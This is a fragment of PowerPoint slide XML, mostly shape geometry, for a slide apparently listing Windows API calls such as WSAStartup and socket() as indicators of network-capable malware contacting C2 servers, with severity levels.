          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="339138" h="339138">
                <a:moveTo>
                  <a:pt x="33914" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="305224" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="323954" y="0"/>
                  <a:pt x="339138" y="15184"/>
                  <a:pt x="339138" y="33914"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="339138" y="305224"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="339138" y="323954"/>
                  <a:pt x="323954" y="339138"/>
                  <a:pt x="305224" y="339138"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33914" y="339138"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15184" y="339138"/>
                  <a:pt x="0" y="323954"/>
                  <a:pt x="0" y="305224"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33914"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15196"/>
                  <a:pt x="15196" y="0"/>
                  <a:pt x="33914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Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582893" y="1678732"/>
            <a:ext cx="190765" cy="169569"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="190765" h="169569">
                <a:moveTo>
                  <a:pt x="82135" y="29145"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="108630" y="29145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108630" y="45042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82135" y="45042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82135" y="29145"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="79485" y="10598"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="70709" y="10598"/>
                  <a:pt x="63588" y="17719"/>
                  <a:pt x="63588" y="26495"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63588" y="47691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="63588" y="56468"/>
                  <a:pt x="70709" y="63588"/>
                  <a:pt x="79485" y="63588"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84784" y="63588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84784" y="74186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10598" y="74186"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4736" y="74186"/>
                  <a:pt x="0" y="78922"/>
                  <a:pt x="0" y="84784"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="90646"/>
                  <a:pt x="4736" y="95382"/>
                  <a:pt x="10598" y="95382"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="42392" y="95382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42392" y="105981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37093" y="105981"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="28317" y="105981"/>
                  <a:pt x="21196" y="113101"/>
                  <a:pt x="21196" y="121878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21196" y="143074"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21196" y="151850"/>
                  <a:pt x="28317" y="158971"/>
                  <a:pt x="37093" y="158971"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="68887" y="158971"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="77664" y="158971"/>
                  <a:pt x="84784" y="151850"/>
                  <a:pt x="84784" y="143074"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84784" y="121878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="84784" y="113101"/>
                  <a:pt x="77664" y="105981"/>
                  <a:pt x="68887" y="105981"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63588" y="105981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63588" y="95382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127177" y="95382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127177" y="105981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121878" y="105981"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="113101" y="105981"/>
                  <a:pt x="105981" y="113101"/>
                  <a:pt x="105981" y="121878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="105981" y="143074"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="105981" y="151850"/>
                  <a:pt x="113101" y="158971"/>
                  <a:pt x="121878" y="158971"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="153672" y="158971"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="162448" y="158971"/>
                  <a:pt x="169569" y="151850"/>
                  <a:pt x="169569" y="143074"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="169569" y="121878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="169569" y="113101"/>
                  <a:pt x="162448" y="105981"/>
                  <a:pt x="153672" y="105981"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="148373" y="105981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148373" y="95382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180167" y="95382"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="186029" y="95382"/>
                  <a:pt x="190765" y="90646"/>
                  <a:pt x="190765" y="84784"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="190765" y="78922"/>
                  <a:pt x="186029" y="74186"/>
                  <a:pt x="180167" y="74186"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="105981" y="74186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105981" y="63588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111280" y="63588"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="120056" y="63588"/>
                  <a:pt x="127177" y="56468"/>
                  <a:pt x="127177" y="47691"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127177" y="26495"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="127177" y="17719"/>
                  <a:pt x="120056" y="10598"/>
                  <a:pt x="111280" y="10598"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="79485" y="10598"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="148373" y="124527"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="151022" y="124527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151022" y="140424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124527" y="140424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124527" y="124527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148373" y="124527"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="63588" y="124527"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="66238" y="124527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66238" y="140424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39743" y="140424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39743" y="124527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63588" y="124527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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949586" y="1644818"/>
            <a:ext cx="1025892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WSAStartup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08707" y="2034826"/>
            <a:ext cx="3442248" cy="746103"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3442248" h="746103">
                <a:moveTo>
                  <a:pt x="33910" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3408337" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3427065" y="0"/>
                  <a:pt x="3442248" y="15182"/>
                  <a:pt x="3442248" y="33910"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3442248" y="712193"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3442248" y="730921"/>
                  <a:pt x="3427065" y="746103"/>
                  <a:pt x="3408337" y="746103"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33910" y="746103"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15182" y="746103"/>
                  <a:pt x="0" y="730921"/>
                  <a:pt x="0" y="712193"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33910"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15195"/>
                  <a:pt x="15195" y="0"/>
                  <a:pt x="3391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10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610448" y="2136567"/>
            <a:ext cx="3298114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Network Initialization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610448" y="2340050"/>
            <a:ext cx="3298114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WSAStartup(MAKEWORD(2,2),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610448" y="2509619"/>
            <a:ext cx="3298114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&amp;WSAData);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08707" y="2882670"/>
            <a:ext cx="3510075" cy="406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Initializes the Windows Sockets API for network operations. First indicator of network-capable malware.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08707" y="3767820"/>
            <a:ext cx="3442248" cy="6783"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3442248" h="6783">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3442248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3442248" y="6783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4A4F59">
              <a:alpha val="4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7" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508707" y="3872951"/>
            <a:ext cx="350159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Level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08707" y="4076433"/>
            <a:ext cx="3518554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2" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0B1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MEDIUM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239751" y="1458292"/>
            <a:ext cx="3730515" cy="2992890"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3730515" h="2992890">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3730515" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3730515" y="2992890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="299289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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4239751" y="1458292"/>
            <a:ext cx="33914" cy="2992890"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33914" h="2992890">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33914" y="2992890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2992890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Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4392363" y="1593947"/>
            <a:ext cx="339138" cy="339138"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="339138" h="339138">
                <a:moveTo>
                  <a:pt x="33914" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="305224" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="323954" y="0"/>
                  <a:pt x="339138" y="15184"/>
                  <a:pt x="339138" y="33914"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="339138" y="305224"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="339138" y="323954"/>
                  <a:pt x="323954" y="339138"/>
                  <a:pt x="305224" y="339138"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33914" y="339138"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15184" y="339138"/>
                  <a:pt x="0" y="323954"/>
                  <a:pt x="0" y="305224"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33914"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15196"/>
                  <a:pt x="15196" y="0"/>
                  <a:pt x="33914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Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4477147" y="1678732"/>
            <a:ext cx="169569" cy="169569"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="169569" h="169569">
                <a:moveTo>
                  <a:pt x="0" y="74186"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="143637"/>
                  <a:pt x="4736" y="148373"/>
                  <a:pt x="10598" y="148373"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21196" y="148373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21196" y="113929"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21196" y="109524"/>
                  <a:pt x="24740" y="105981"/>
                  <a:pt x="29145" y="105981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33549" y="105981"/>
                  <a:pt x="37093" y="109524"/>
                  <a:pt x="37093" y="113929"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="37093" y="148373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58289" y="148373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58289" y="113929"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="58289" y="109524"/>
                  <a:pt x="61833" y="105981"/>
                  <a:pt x="66238" y="105981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70643" y="105981"/>
                  <a:pt x="74186" y="109524"/>
                  <a:pt x="74186" y="113929"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="74186" y="148373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95382" y="148373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95382" y="113929"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="95382" y="109524"/>
                  <a:pt x="98926" y="105981"/>
                  <a:pt x="103331" y="105981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107736" y="105981"/>
                  <a:pt x="111280" y="109524"/>
                  <a:pt x="111280" y="113929"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="111280" y="148373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132476" y="148373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132476" y="113929"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="132476" y="109524"/>
                  <a:pt x="136019" y="105981"/>
                  <a:pt x="140424" y="105981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144829" y="105981"/>
                  <a:pt x="148373" y="109524"/>
                  <a:pt x="148373" y="113929"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="148373" y="148373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158971" y="148373"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="164833" y="148373"/>
                  <a:pt x="169569" y="143637"/>
                  <a:pt x="169569" y="137775"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="169569" y="74186"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="169569" y="68324"/>
                  <a:pt x="164833" y="63588"/>
                  <a:pt x="158971" y="63588"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="148373" y="63588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148373" y="52990"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="148373" y="47128"/>
                  <a:pt x="143637" y="42392"/>
                  <a:pt x="137775" y="42392"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127177" y="42392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127177" y="31794"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="127177" y="25932"/>
                  <a:pt x="122441" y="21196"/>
                  <a:pt x="116579" y="21196"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="52990" y="21196"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="47128" y="21196"/>
                  <a:pt x="42392" y="25932"/>
                  <a:pt x="42392" y="31794"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="42392" y="42392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31794" y="42392"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="25932" y="42392"/>
                  <a:pt x="21196" y="47128"/>
                  <a:pt x="21196" y="52990"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21196" y="63588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10598" y="63588"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4736" y="63588"/>
                  <a:pt x="0" y="68324"/>
                  <a:pt x="0" y="74186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Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833242" y="1644818"/>
            <a:ext cx="1466771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Socket Operations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392363" y="2034826"/>
            <a:ext cx="3442248" cy="915672"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3442248" h="915672">
                <a:moveTo>
                  <a:pt x="33916" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3408331" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3427063" y="0"/>
                  <a:pt x="3442248" y="15185"/>
                  <a:pt x="3442248" y="33916"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3442248" y="881755"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3442248" y="900487"/>
                  <a:pt x="3427063" y="915672"/>
                  <a:pt x="3408331" y="915672"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33916" y="915672"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15185" y="915672"/>
                  <a:pt x="0" y="900487"/>
                  <a:pt x="0" y="881755"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33916"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15185"/>
                  <a:pt x="15185" y="0"/>
                  <a:pt x="33916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Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4494104" y="2136567"/>
            <a:ext cx="3298114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Socket Creation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4494104" y="2340050"/>
            <a:ext cx="3298114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socket(AF_INET,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4494104" y="2509619"/>
            <a:ext cx="3298114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SOCK_STREAM,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4494104" y="2679188"/>
            <a:ext cx="3298114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IPPROTO_TCP);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4392363" y="3052239"/>
            <a:ext cx="3510075" cy="406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Creates TCP sockets for reliable, persistent connections to C2 servers, enabling bidirectional communication.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4392363" y="3767820"/>
            <a:ext cx="3442248" cy="6783"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3442248" h="6783">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3442248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3442248" y="6783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4A4F59">
              <a:alpha val="4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Text 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4392363" y="3872951"/>
            <a:ext cx="350159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Level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4392363" y="4076433"/>
            <a:ext cx="3518554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2" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF690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123514" y="1458292"/>
            <a:ext cx="3730515" cy="2992890"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3730515" h="2992890">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3730515" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3730515" y="2992890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="299289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4" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8123514" y="1458292"/>
            <a:ext cx="33914" cy="2992890"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33914" h="2992890">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33914" y="2992890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="299289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5" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8276126" y="1593947"/>
            <a:ext cx="339138" cy="339138"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="339138" h="339138">
                <a:moveTo>
                  <a:pt x="33914" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="305224" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="323954" y="0"/>
                  <a:pt x="339138" y="15184"/>
                  <a:pt x="339138" y="33914"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="339138" y="305224"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="339138" y="323954"/>
                  <a:pt x="323954" y="339138"/>
                  <a:pt x="305224" y="339138"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33914" y="339138"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15184" y="339138"/>
                  <a:pt x="0" y="323954"/>
                  <a:pt x="0" y="305224"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33914"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15196"/>
                  <a:pt x="15196" y="0"/>
                  <a:pt x="33914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Shape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8371508" y="1678732"/>
            <a:ext cx="148373" cy="169569"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="148373" h="169569">
                <a:moveTo>
                  <a:pt x="21196" y="10598"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9505" y="10598"/>
                  <a:pt x="0" y="20103"/>
                  <a:pt x="0" y="31794"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="52990"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="64681"/>
                  <a:pt x="9505" y="74186"/>
                  <a:pt x="21196" y="74186"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127177" y="74186"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="138868" y="74186"/>
                  <a:pt x="148373" y="64681"/>
                  <a:pt x="148373" y="52990"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="148373" y="31794"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="148373" y="20103"/>
                  <a:pt x="138868" y="10598"/>
                  <a:pt x="127177" y="10598"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21196" y="10598"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="92733" y="34444"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="97120" y="34444"/>
                  <a:pt x="100682" y="38005"/>
                  <a:pt x="100682" y="42392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="100682" y="46779"/>
                  <a:pt x="97120" y="50341"/>
                  <a:pt x="92733" y="50341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88346" y="50341"/>
                  <a:pt x="84784" y="46779"/>
                  <a:pt x="84784" y="42392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84784" y="38005"/>
                  <a:pt x="88346" y="34444"/>
                  <a:pt x="92733" y="34444"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="111280" y="42392"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="111280" y="38005"/>
                  <a:pt x="114841" y="34444"/>
                  <a:pt x="119228" y="34444"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123615" y="34444"/>
                  <a:pt x="127177" y="38005"/>
                  <a:pt x="127177" y="42392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127177" y="46779"/>
                  <a:pt x="123615" y="50341"/>
                  <a:pt x="119228" y="50341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114841" y="50341"/>
                  <a:pt x="111280" y="46779"/>
                  <a:pt x="111280" y="42392"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21196" y="95382"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9505" y="95382"/>
                  <a:pt x="0" y="104888"/>
                  <a:pt x="0" y="116579"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="137775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="149466"/>
                  <a:pt x="9505" y="158971"/>
                  <a:pt x="21196" y="158971"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127177" y="158971"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="138868" y="158971"/>
                  <a:pt x="148373" y="149466"/>
                  <a:pt x="148373" y="137775"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="148373" y="116579"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="148373" y="104888"/>
                  <a:pt x="138868" y="95382"/>
                  <a:pt x="127177" y="95382"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21196" y="95382"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="92733" y="119228"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="97120" y="119228"/>
                  <a:pt x="100682" y="122790"/>
                  <a:pt x="100682" y="127177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="100682" y="131564"/>
                  <a:pt x="97120" y="135125"/>
                  <a:pt x="92733" y="135125"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88346" y="135125"/>
                  <a:pt x="84784" y="131564"/>
